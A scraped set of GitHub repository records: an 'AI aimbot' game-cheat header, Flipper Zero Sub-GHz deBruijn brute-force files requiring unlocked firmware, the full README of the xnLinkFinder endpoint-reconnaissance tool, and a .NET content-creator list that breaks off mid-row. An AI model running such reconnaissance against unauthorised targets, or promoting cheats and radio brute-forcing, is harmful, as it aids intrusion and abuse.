Coding and Aiming! ๐ŸŽ‰๐Ÿ‘พ
World's Best AI Aimbot - CS2, Valorant, Fortnite, APEX, every game
machine-learning,aimbot,aimbotcsgo,video-game-ai,aimbot-valorant,aimbot-tarkov,ai-aimbot,ml-aimbot,cs2,cs2-aimbot
0
18
43
122
24
9
0
MuddledBox/FlipperZeroSub-GHz
# FlipperZeroSub-GHz Sub-GHz Files for the Flipper Zero What deBruijn file do I use for what? ![image](https://user-images.githubusercontent.com/101580720/160041184-d93d5231-31be-49b4-9ca9-0d4f1b1924b5.png) Add to your X:\subghz folder on your SD card! UNLOCKED FIRMWARE REQUIRED! Available here: https://github.com/MuddledBox/flipperzero-firmware/releases
Sub-GHz Files for the Flipper Zero
null
0
2
4
29
7
1
0
xnl-h4ck3r/xnLinkFinder
<center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/title.png"></center> ## About - v6.3 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by: - crawling a target (pass a domain/URL) - crawling multiple targets (pass a file of domains/URLs) - searching files in a given directory (pass a directory name) - get them from a **Burp** project (pass location of a Burp XML file) - get them from an **OWASP ZAP** project (pass location of a ZAP ASCII message file) - get them from a **Caido** project (pass location of a Caido export CSV file) - processing a [waymore](https://github.com/xnl-h4ck3r/waymore) results directory (searching archived response files from `waymore -mode R` and also requesting URLs from `waymore.txt` and the original URLs from `index.txt` - see [waymore README.md](https://github.com/xnl-h4ck3r/waymore/blob/main/README.md)) The python script is based on the link finding capabilities of my Burp extension [GAP](https://github.com/xnl-h4ck3r/burp-extensions). As a starting point, I took the amazing tool [LinkFinder](https://github.com/GerbenJavado/LinkFinder) by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more. ## Installation `xnLinkFinder` supports **Python 3**. Install `xnLinkFinder` in default (global) python environment. ```bash pip install xnLinkFinder ``` OR ```bash pip install git+https://github.com/xnl-h4ck3r/xnLinkFinder.git -v ``` You can upgrade with ```bash pip install --upgrade xnLinkFinder ``` ### pipx Quick setup in isolated python environment using [pipx](https://pypa.github.io/pipx/) ```bash pipx install git+https://github.com/xnl-h4ck3r/xnLinkFinder.git ``` ## Usage | Arg | Long Arg | Description | | ----------- | -------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | -i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file, an OWASP ZAP output file, or a Caido CSV file. | | -o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to `cli` then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option `-ow` is passed. | | -op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to `cli` then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option `-ow` is passed. | | -owl | --output-wordlist | The file to save the target specific Wordlist output to, including path if necessary (default: No wordlist output). If set to `cli` then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. | | -oo | --output-oos | The file to save the out of scope links output to, including path if necessary (default: No OOS output). If set to `cli` then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. | | -ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. | | -sp | --scope-prefix | Any links found starting with `/` will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. | | -spo | --scope-prefix-original | If argument `-sp` is passed, then this determines whether the original link starting with `/` is also included in the output (default: false) | | -spkf | --scope-prefix-keep-failed | If argument `-spkf` is passed, then this determines whether a prefixed link will be kept in the output if it was a 404 or a RequestException occurs (default: false) | | -sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. This argument is now mandatory if input is a domain/URL (or file of domains/URLs) to prevent crawling sites that are not in scope and also preventing misleading results. | | -c | --cookies โ€  | Add cookies to pass with HTTP requests. Pass in the format `'name1=value1; name2=value2;'` | | -H | --headers โ€  | Add custom headers to pass with HTTP requests. Pass in the format `'Header1: value1; Header2: value2;'` | | -ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. `/api/v[0-9]\.[0-9]\*` ). If it matches, the link is output. | | -d | --depth โ€  | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files, ZAP files and Caido files because they can be huge and consume lots of memory. It is also advisable to use the `-sp` (`--scope-prefix`) argument to ensure a request to links found without a domain can be attempted. | | -p | --processes โ€  | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file, ZAP file or Caido file). This argument determines the number of processes (threads) used (default: 25) | | -x | --exclude | Additional Link exclusions (to the list in `config.yml`) in a comma separated list, e.g. `careers,forum` | | -orig | --origin | Whether you want the origin of the link to be in the output. Displayed as `LINK-URL [ORIGIN-URL]` in the output (default: false) | | -prefixed | | Whether you want to see which links were prefixed in the output. Displays `(PREFIXED)` after link and origin in the output (default: false) | | -xrel | --exclude-relative-links | By default, if any links in the results start with `./` or `../`, they will be included. If this argument is used, these relative links will not be added. | | -t | --timeout โ€  | How many seconds to wait for the server to send data before giving up (default: 10 seconds) | | -inc | --include | Include input (`-i`) links in the output (default: false) | | -u | --user-agent โ€  | What User Agents to get links for, e.g. `-u desktop mobile`. Possible values are `desktop`, `mobile`, `set-top-boxes` and `game-console`. Also there are `mobile-apple`, `mobile-android` and `mobile-windows` that are subsets of `mobile` but can be used separately. | | -uc | --user-agent-custom โ€  | A custom User Agent string to use for all requests. This will override the `-u`/`--user-agent` argument. This can be used when a program requires a specific User Agent header to identify you for example. | | -insecure | โ€  | Whether TLS certificate checks should be disabled when making requests (delfault: false) | | -s429 | โ€  | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) | | -s403 | โ€  | Stop when > 95 percent of responses return 403 Forbidden (default: false) | | -sTO | โ€  | Stop when > 95 percent of requests time out (default: false) | | -sCE | โ€  | Stop when > 95 percent of requests have connection errors (default: false) | | -m | --memory-threshold | The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) | | -mfs | --max-file-size โ€  | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size. | | -rp | --replay-proxyโ€  | For active link finding with URL (or file of URLs), replay the requests through this proxy. | | -ascii-only | | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. | | -mtl | --max-time-limit | The maximum time limit (in minutes) to run before stopping (default: 0). If 0 is passed, there is no limit. | | | --config | Path to the YML config file. If not passed, it looks for file `config.yml` in the default directory, typically `~/.config/xnLinkFinder`. | | -nwlpl | --no-wordlist-plurals | When words are found for a target specific wordlist, by default new words are added if there is a singular word from a plural, and vice versa. If this argument is used, this process is not done. | | -nwlpw | --no-wordlist-pathwords | By default, any path words found in the links will be processed for the target specific wordlist. If this argument is used, they will not be processed. **NOTE: if the YAML config value of `respParamPathWords` is `True` then this argument will not have any effect unless `-nwlpm`/`--no-wordlist-parameters` is also passed.** | | -nwlpm | --no-wordlist-parameters | By default, any parameters found in the links will be processed for the target specific wordlist. If this argument is used, they will not be processed. | | -nwlc | --no-wordlist-comments | By default, any comments in pages will be processed for the target specific wordlist. If this argument is used, they will not be processed. | | -nwlia | --no-wordlist-imgalt | By default, any image 'alt' attributes will be processed for the target specific wordlist. If this argument is used, they will not be processed. | | -nwld | --no-wordlist-digits | Exclude any words from the target specific wordlist with numerical digits in. | | -nwll | --no-wordlist-lowercase | By default, any word added with any uppercase characters in will also add the word in lowercase. If this argument is used, the lowercase words will not be added. | | -wlml | --wordlist-maxlen | The maximum length of words to add to the target specific wordlist, excluding plurals (default: 0 - no limit) | | -swf | --stopwords-file | A file of additional Stop Words (in addition to "stopWords" in the YML Config file) used to exclude words from the target specific wordlist. Stop Words are used in Natural Language Processing and different lists can be found in different libraries. You may want to add words in different languages, depending on your target. | | -brt | --burpfile-remove-tags | When the input passed with `-i` is a Burp file, the user is asked interactively whether they want to remove unnecessary tags from that file (sometimes there is a problem in Burp XML files that can often be resolved by removing unnecessary tags which will also make the file smaller). If you are using xnLinkFinder in a script, you don't want to break for user input, so you can set that by passing this argument with a `true` or `false`. NOTE: This is a permanent change to the file | | -nb | --no-banner | Hides the tool banner. | | -v | --verbose | Verbose output | | -vv | --vverbose | Increased verbose output | | | --version | Show current version number. | | -h | --help | show the help message and exit | โ€  NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE, OWASP ZAP FILE OR CAIDO CSV FILE ## config.yml The `config.yml` file (typically in `~/.config/xnLinkFinder/`) has the keys which can be updated to suit your needs: - `linkExclude` - A comma separated list of strings (e.g. `.css,.jpg,.jpeg` etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list. - `contentExclude` - A comma separated list of strings (e.g. `text/css,image/jpeg,image/jpg` etc.) that all responses `Content-Type` headers are checked against. Any responses with the these content types will be excluded and not checked for links. - `fileExtExclude` - A comma separated list of strings (e.g. `.zip,.gz,.tar` etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links. Also, in normal mode, if a response doesn't have a content-type to check for exclusions, it will check for these extensions at the end of the URL to determine if to search for links. - `regexFiles` - A list of file types separated by a pipe character (e.g. `php|php3|php5` etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. `js\.map` - `respParamLinksFound` โ€  - Whether to get potential parameters from links found in responses: `True` or `False` - `respParamPathWords` โ€  - Whether to add path words in retrieved links as potential parameters: `True` or `False` - `respParamJSON` โ€  - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: `True` or `False` - `respParamJSVars` โ€  - Whether javascript variables set with `var`, `let` or `const` are added as potential parameters: `True` or `False` - `respParamXML` โ€  - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: `True` or `False` - `respParamInputField` โ€  - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: `True` or `False` - `respParamMetaName` โ€  - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: `True` or `False` - `wordsContentTypes` - A comma separated list of strings (e.g. `text/html,text/plain`) to specify which response content types will be searched for words to go in the target specific wordlist. - `stopWords` - A comma separated list of strings (e.g. `then,this,that`) to specify words that are excluded from the target specific wordlist. This default list is initially made up of English determiners, coordinating conjuctions and prepositions, plus a list of stop words from Scikit-Learn, a python machine learning library. โ€  IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO `True` ## Examples ### Find Links from a specific target - Basic ``` xnLinkFinder -i target.com -sf target.com ``` ### Find Links from a specific target - Detailed Ideally, provide scope prefix (`-sp`) with the primary domain (including schema), and a scope filter (`-sf`) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (`-u desktop mobile`) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (`-d`) will keep sending request to links found on the previous depth search to find more links. ``` xnLinkFinder -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10 ``` ### Find Links from a list of URLs - Basic If you have a file of JS file URLs for example, you can look for links in those: ``` xnLinkFinder -i target_js.txt -sf target.com ``` ### Find Links from a files in a directory - Basic If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those: ``` xnLinkFinder -i ~/.config/waymore/results/target.com ``` NOTE: Sub directories are also checked. The `-mfs` option can be specified to skip files over a certain size. ### Find Links from a Burp project - Basic In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the `Save selected items`. Ensure that the option `base64-encode requests and responses` option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links): ``` xnLinkFinder -i target_burp.xml ``` NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with `-i` starts with `<?xml` then you are trying to process a Burp file. ### Find Links from a Burp project - Detailed Ideally, provide scope prefix (`-sp`) with the primary domain (including schema), and a scope filter (`-sf`) to filter the results only to relevant domains. ``` xnLinkFinder -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv ``` ### Find Links from an OWASP ZAP project - Basic In ZAP, select the items you want to search by highlighting the History for example, clicking menu `Export` and selecting `Export Messages to File...`. This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links): ``` xnLinkFinder -i target_zap.txt ``` NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with `-i` is in the format `==== 99 ==========` (v2.11.1) or `===99 ==========` (v2.12) for example, then you are trying to process an OWASP ZAP ASCII text file. ### Find Links from a Cadio export CSV file - Basic In Caido, go to the **History** section and select the **Export** option. If you are using Caido Pro or Enterprise edition, then choose the **Export current rows** option and pick **As CSV**. Go to the **Exports** section and download the CSV file. Then pass as input: ``` xnLinkFinder -i 2023-03-18-010332_csv_requests.csv ``` If you are using Caido Community edition, then you will have to choose the **Export all** option and pick **As CSV**. Go to the **Exports** section and download the CSV file. As you have the full history, you will want to remove anything that is not relevant from the CSV file. Use the example below, where `redbull` is the main part of the domains of the target you are looking at. ``` cat 2023-03-18-010332_csv_requests.csv | grep -E '^id|^[0-9]+,[^,]*redbull' > caido_redbull.csv xnLinkFinder -i caido_redbull.csv ``` NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with `-i` is in the format `id,host,method`, then you are trying to process a Caido export CSV file. ### Find Links from a Waymore results directory The [waymore](https://github.com/xnl-h4ck3r/waymore) tool can be used to get URLs from various third party APIs, and also download archived responses from archive.org (Wayback Machine). Passing a waymore results directory to `xnLinKFinder` will search the contents of archived responses, and also request URLs from `waymore.txt` and also the archived URLs from `index.txt` and get more links from those responses. ``` xnLinkFinder -i ~/Tools/waymore/results/target.com ``` NOTE: It is passed as a normal directory, but xnLinkFinder will determine it is a waymore results directory and process respectively. This relies on the default naming convention of the URLs file being `waymore.txt` and that file being in the same directory as the archived files (which it is by default). ### Piping to other Tools You can pipe xnLinkFinder to other tools. Any errors are sent to `stderr` and any links found are sent to `stdout`. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example: ``` xnLinkFinder -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u ``` You can also pass the input through `stdin` instead of `-i`. ``` cat redbull_subs.txt | xnLinkFinder -sp https://redbull.com -sf rebbull.* -d 3 ``` NOTE: You can't pipe in a Burp, ZAP or Caido file, these must be passed using `-i`. ## Recommendations and Notes - Always use the Scope Prefix argument `-sp`. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http): ``` http://www.target.com https://target-payments.com https://static.target-cdn.com ``` If a link is found that has no domain, e.g. `/path/to/example.js` then giving passing `-sp http://www.target.com` will result in teh output `http://www.target.com/path/to/example.js` and if Depth (`-d`) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using `-sp` then the output will include each domain followed by `/path/to/example.js` and increase the chance of finding more links. - If you use `-sp` but still want the original link of `/path/to/example.js` (without a domain) additionally returned in the output, the pass the argument `-spo`. - Always use the Scope Filter argument `-sf`. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (`-d`) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included): ``` target.* target-payments.com static.target-cdn.com ``` THIS IS FOR FILTERING THE LINKS DOMAIN ONLY. - If you want to filter the final output in any way, use `-ra`. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect. - Use the `-v` option to have a better idea of what the tool is doing. - If you have problems, use the `-vv` option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github. - Pass cookies (`-c`), headers (`-H`) and regex (`-ra`) values within single quotes, e.g. `-ra '/api/v[0-9]\.[0-9]\*'` - Set the `-o` option to give a specific output file name for Links, rather than the default of `output.txt`. If you plan on running a large depth of searches, start with 2 with option `-v` to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass `-ow`. - Set the `-op` option to give a specific output file name for Potential Parameters, rather than the default of `parameters.txt`. Any output will be appended to the existing file, unless you pass `-ow`. - If using a high Depth (`-d`) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (`s429`, `s403`, `sTO`, `sCE`) should also be considered. - If you are finding a large number of links, especially if the Depth (`-d` value) is high, and have limited resources, the program will stop when it reaches the memory Threshold (`-m`) value and end gracefully with data intact before getting killed. - If you decide to cancel xnLinkFinder (using `Ctrl-C`) in the middle of running, be patient and any gathered data will be saved before ending gracefully. - Using the `-orig` option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets. - When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to `desktop` (unless the `-uc`/`--user-agent-custom` argument is used). If you have a target that could have different links for different user agent groups, then specify `-u desktop mobile` for example (separate with a space). The `mobile` user agent option is an combination of `mobile-apple`, `mobile-android` and `mobile-windows`. Possible values are `desktop`, `mobile`, `set-top-boxes` and `game-console`. - When `-i` has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by `-mfs` (default: 500 MB) will be skipped. - When using the `-replay-proxy` option, sometimes requests can take longer. If you start seeing more `Request Timeout` errors (you'll see errors if you use `-v` or `-vv` options) then consider using `-t` to raise the timeout limit. - If you know a target will only have ASCII characters in links and parameters then consider passing `-ascii-only`. This can eliminate a number of false positives that can sometimes get returned from binary data. - If you pass a [waymore](https://github.com/xnl-h4ck3r/waymore) results directory, it is worth passing the `-d`/`--depth` argument to search any extra links found from URL requests and also the `-u`/`--user-agent` if you think there could be different content found, e.g. `-u desktop mobile`. - Always pass the `-owl`/`--output-wordlist` filename to save the target specific wordlist. This list can be very useful when fuzzing a target. - The words for the target specific wordlist are taken from the following sources (any of 3 characters or more), but are also determined by the other wordlist arguments (see Usage section above): - All responses with certain conditions: - Only responses with content types specific in the YML config `wordsContentTypes` section are searched. The defaults are `text/html`,`application/xml`,`application/json`,`text/plain` - Words from `<meta>` tag content where: - `Property` is `og:title` or `og:description` - `Name` is `description`,`keywords`,`twitter:title` or `twitter:description` - Words from HTML comments - Words from `alt` attribute of `<img>` tags - Words from the rest of the inner HTML of the page, excluding tags `<style>`, `<script>` and `<link`> - Words found from path words in links found. - Parameters found from responses and links. - All valid words will also have the singular/plural version added to the wordlist if possible. - If the original word has any upper case characters, a lower case version will also be added - If the default "Stop Words" for a target specific wordlist are not good enough, either change in the YML config file, or provide additional stop words using the `-swf`/`--stopwords-file` option. You may want to include stop words in another language, depending on the target. Stop words are used in Natural Language Processing (NLP) and many stop word lists can be found online to suit different needs. ## Issues If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with `-vv` to reproduce the problem and let me know about any error messages that are given. ## TODO - I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know ๐Ÿค˜ ## Example output Active link finding for a domain: <center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/example1a.png"></center> ... <center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/example1b.png"></center> Piped input and output: <center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/example2.png"></center> Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider [BUYING ME A COFFEE!](https://ko-fi.com/xnlh4ck3r) โ˜• (I could use the caffeine!) ๐Ÿค˜ /XNL-h4ck3r <a href='https://ko-fi.com/B0B3CZKR5' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi2.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target
null
35
2
3
83
2
1
0
matthiasjost/dotnet-content-creators
# :zap: My Favourite .NET Content Creators Please also see [WeAreDotnet](https://www.WeAreDotnet.io), a community for .NET content creators (founded by Tim [@TimCadenbach](https://twitter.com/TimCadenbach) and Matthias [@jost0101](https://twitter.com/jost0101)) The repo accepts new updates, but the amount of effort the maintainer puts into it has been reduced. Most entries are from 2022/2023. I am still reviewing and merging PRs from you. ## โœ๏ธ What Are Creators? By creators, we mean enthusiasts who create content for Blogs, YouTube, Twitch, Books, and tutorial platforms (e.g. Pluralsight). The content can be free or paid. ## ๐Ÿ—ฃ๏ธ Language We only list creators and channels with English content. ## ๐ŸŒŽ Why Does The Country Sort The List? The country doesn't matter, but it is a way to divide the List into sections and challenge everyone to find good creators from all countries. ## ๐Ÿ“บ What Are Channels? Channels contain the links on which the creator is most active. ## โ˜˜๏ธ How To Contribute? Add your favourite creators by creating a PR. - Channels: Max. 5 links - Tags: Max. 5 tags ## :calendar: 2022/23 All creators under this section must have published something in 2022 or 2023. ### Argentina <img src="4x3/ar.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Daniel Cazzulino | [Blog](https://www.cazzulino.com/), [Twitter](https://twitter.com/kzu), [LinkedIn](https://www.linkedin.com/in/danielcazzulino/) | .NET, C# | ### Australia <img src="4x3/au.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Christian Findlay | [Blog](https://christianfindlay.com), [Twitter](https://twitter.com/cfdevelop), [Mastodon](https://fosstodon.org/@cfdevelop) | .NET, C# | | Jason Taylor | [Blog](https://jasontaylor.dev/), [LinkedIn](https://www.linkedin.com/in/jasontaylordev/), [Twitter](https://twitter.com/jasontaylordev) | .NET | Les Jackson | [YouTube](https://www.youtube.com/c/binarythistle), [Blog](https://dotnetplaybook.com/), [Twitter](https://twitter.com/binarythistle), [Linktree](https://linktr.ee/binarythistle) | .NET MAUI, ASP.NET Core, Blazor | | Rahul Nath | [YouTube](https://www.youtube.com/c/RahulNath), [Twitter](https://twitter.com/rahulpnath), [LinkedIn](https://www.linkedin.com/in/rahulpnath/) | ASP.NET Core, .NET on AWS | | Rahul Rai | [Blog](https://thecloudblog.net), [LinkedIn](https://www.linkedin.com/in/rahulrai-in/), [Twitter](https://twitter.com/rahulrai_in) | Azure, Kubernetes | ### Austria <img src="4x3/at.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Christian Nagel | [Blog](https://csharp.christiannagel.com), [Twitter](https://twitter.com/ChristianNagel) | .NET, C# | | Wolfgang Ziegler | [Blog](https://wolfgang-ziegler.com/), [Mastodon](https://fosstodon.org/@wolfgang@hachyderm.io), [LinkedIn](https://www.linkedin.com/in/wolfgangz/) | .NET MAUI, C# | ### Bahrain <img src="4x3/bh.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Naweed Akram | [Blog](https://blogs.xgenoapps.com/), [Twitter](https://twitter.com/xgeno), [YouTube](https://www.youtube.com/@naweedakram), [LinkedIn](https://www.linkedin.com/in/naweed/) | .NET MAUI | ### Bosnia and Herzegovina <img src="4x3/ba.svg" height="35"> | Name | Channels | Tags | |--------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------| | Admir Mujkic | [Blog](https://admirlive.medium.com/), [LinkedIn](https://www.linkedin.com/in/admir-live/) | .NET, Architecture, C#, Ai, EF Core | ### Belgium <img src="4x3/be.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Kevin Dockx | [Blog](https://www.kevindockx.com/), [GitHub](https://github.com/kevindockx), [Pluralsight](https://www.pluralsight.com/authors/kevin-dockx), [Twitter](https://twitter.com/kevindockx) | .NET, Architecture, C#, ASP.NET Core, EF Core | | Maarten Balliauw | [Blog](https://blog.maartenballiauw.be/), [LinkedIn](https://www.linkedin.com/in/maartenballiauw/), [Mastodon](https://mastodon.online/@maartenballiauw), [Twitter](https://twitter.com/maartenballiauw) | .NET, C#, ASP.NET Core | ### Canada <img src="4x3/ca.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Anthony Giretti | [Blog](https://anthonygiretti.com/), [Twitter](https://twitter.com/anthonygiretti), [LinkedIn](https://www.linkedin.com/in/anthony-g-98670426/), [gRPC/ASP.NET (Book)](https://www.amazon.com/Beginning-gRPC-ASP-NET-Core-Applications/dp/1484280075) | .NET, C# | | Derek Comartin | [YouTube](https://www.youtube.com/channel/UC3RKA4vunFAfrfxiJhPEplw), [Blog](https://codeopinion.com), [LinkedIn](https://www.linkedin.com/in/dcomartin/), [Twitter](https://twitter.com/codeopinion) | Architecture, .NET | | Frank Liu | [YouTube](https://www.youtube.com/c/FrankLiuSoftware/), [Site](https://frankliucs.com), [Blog](https://frankliucs.com/blog/), [Twitter](https://twitter.com/frankliucs) | Blazor, ASP.NET Core | | Gรฉrald Barrรฉ | [Blog](https://www.meziantou.net/), [Twitter](https://twitter.com/meziantou), [Mastodon](https://hachyderm.io/@meziantou), [GitHub](https://github.com/meziantou), [LinkedIn](https://www.linkedin.com/in/meziantou/) | .NET, ASP.NET Core, Blazor, C# | | Jhonatan Oliveira | [Blog](https://blog.jhonatanoliveira.dev/), [GitHub](https://github.com/jhonatanfernando), [Twitter](https://twitter.com/jhonatanfoliv), [LinkedIn](https://www.linkedin.com/in/jhonatanfernando/) | .NET, C#, ASP.NET Core, .NET MAUI | Jonathan Dick | [GitHub](https://github.com/redth), [Blog](https://redth.codes/), [Twitter](https://twitter.com/redth), [Mastodon](https://mas.to/@redth) | Microsoft, .NET MAUI, Xamarin, C# | | Nick Cosentino (Dev Leader) | [Website](https://www.devleader.ca), [YouTube](https://www.youtube.com/@devleader), [TikTok](https://www.tiktok.com/@devleader), [Twitter](https://www.twitter.com/devleaderca), [All Dev Leader Links](https://linktr.ee/devleader) | .NET, C#, Tutorials, Microsoft, Unity3D | | Richard Campbell | [Podcast (.NET Rocks!)](https://www.dotnetrocks.com/), [LinkedIn](https://www.linkedin.com/in/richjcampbell/), [Twitter](https://twitter.com/richcampbell) | Podcast, .NET | ### Costa Rica <img src="4x3/cr.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Josรฉ Pablo Ramรญrez Vargas | [Blog](https://webjose.hashnode.dev), [LinkedIn](https://www.linkedin.com/in/jos%C3%A9-pablo-ram%C3%ADrez-vargas-308b6180/), [Mastodon](https://dotnet.social/@webJose), [GitHub](https://github.com/webJose) | Architecture, .NET, ASP.NET Core, C# | ### Czechia Republic <img src="4x3/cz.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Martin Zikmund | [Blog](https://blog.mzikmund.com/), [Twitter](https://twitter.com/mzikmunddev) | .NET, C#, Uno Platform | ### Denmark <img src="4x3/dk.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Erik Ejlskov Jensen | [Blog](https://erikej.github.io/), [Twitter](https://twitter.com/erikej) | EF Core, ADO.NET | Mark Seemann | [Blog](https://blog.ploeh.dk/), [Twitter](https://twitter.com/ploeh) | Architecutre, .NET, F# | Niels Pilgaard | [Blog](https://pilgaard-blog.azurewebsites.net/), [Twitter](https://twitter.com/Niels_Pilgaard) | Blazor, C#, Azure ### Dominican Republic <img src="4x3/do.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Leomaris Reyes | [Blog](https://askxammy.com/), [LinkedIn](https://www.linkedin.com/in/leomaris-reyes-1b598661), [Telerik](https://www.telerik.com/blogs/author/leomaris-reyes), [Twitter](https://twitter.com/leomarisreyes11) | .NET MAUI, Xamarin | | Steven Checo | [Blog](https://checox.com) | .NET MAUI | ### Egypt <img src="4x3/eg.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Shady Nagy | [Blog](https://shadynagy.com/), [Twitter](https://twitter.com/ShadyNagy_) | .NET, ASP.NET Core | | Ahmed Tarek | [Website](https://developmentsimplyput.com), [Blog](https://developmentsimplyput.com/blog), [LinkedIn](https://www.linkedin.com/in/atarekhasan), [Twitter](https://twitter.com/AhmedTarekHasa1) | .NET, ASP.NET Core | ### France <img src="4x3/fr.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Alexandre Nedelec | [Blog](https://www.techwatching.dev/), [Twitter](https://twitter.com/TechWatching), [LinkedIn](https://www.linkedin.com/in/alexandre-n%C3%A9d%C3%A9lec-24565549/) | .NET, C#, Azure | | Alexis Chรขn GRIDEL | [Blog](https://agdl.dev), [Twitter](https://twitter.com/alexiscgridel), [LinkedIn](https://www.linkedin.com/in/alexisgridel/) | C#, .NET | | Cyril Canovas | [Blog](https://goatreview.com/) | .NET, Akka.NET, Architecture | | Daniel Lawson | [Twitter Threads](https://github.com/danylaws/my-twitter-threads), [Twitter](https://twitter.com/danylaws), [GitHub](https://github.com/danylaws) | C#, AWS | | Jรฉrรฉmy BRUN-PICARD | [Blog](https://www.respawnsive.com/en/author/jeremy-brunpicardrespawnsive-com/), [Twitter](https://twitter.com/jbrunpicard), [LinkedIn](https://www.linkedin.com/in/jeremybrunpicard/) | .NET, Xamarin/MAUI, Architecture | | Kevin Gosse | [Twitter](https://twitter.com/KooKiz), [Blog](https://minidump.net/) | .NET, C# | | Laurent Egbakou | [Blog](https://lioncoding.com), [Twitter](https://twitter.com/lioncoding) | .NET, Azure | | Laurent Kempรฉ | [Blog](https://laurentkempe.com/), [Twitter](https://twitter.com/laurentkempe), 